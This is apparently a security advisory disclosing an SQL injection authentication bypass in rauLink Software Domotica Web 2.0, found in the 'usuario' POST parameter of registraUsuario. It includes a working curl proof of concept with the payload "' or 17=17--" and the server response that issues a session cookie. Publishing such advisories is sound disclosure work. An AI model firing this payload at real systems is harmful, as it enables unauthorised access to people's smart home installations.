rauLink Software Domotica Web version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
2e87055a57f33f9b29edeaf78101e3e4
rauLink Software Domotica Web 2.0 SQL Injection Authentication Bypass
Vendor: rauLink Software (raulsoria)
Product web page: N/A
Affected version: 2.0
Summary: Smart home automation software.
Desc: The application suffers from an SQL Injection vulnerability.
Input passed through 'usuario' POST parameter in registraUsuario is
not properly sanitised before being returned to the user or used in
SQL queries. This can be exploited to manipulate SQL queries by
injecting arbitrary SQL code and bypass the authentication mechanism.
Tested on: Apache/2.4.6 (Ubuntu)
PHP/5.5.3-1ubuntu2.6
phpPgAdmin/5.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5572
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5572.php
10.03.2020
--
$ curl http://192.168.1.75/registro/registraUsuario -X POST -d"usuario=' or 17=17--&password=zsl"
HTTP/1.1 200 OK
Date: Wed, 28 May 2008 00:06:54 GMT
Server: Apache/2.4.6 (Ubuntu)
X-Powered-By: PHP/5.5.3-1ubuntu2.6
Set-Cookie: PHPSESSID=gl8tbui3skca9d74m5pg7l6q96; path=/
Expires: Thu, 10 Dec 1983 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Content-Type: text/html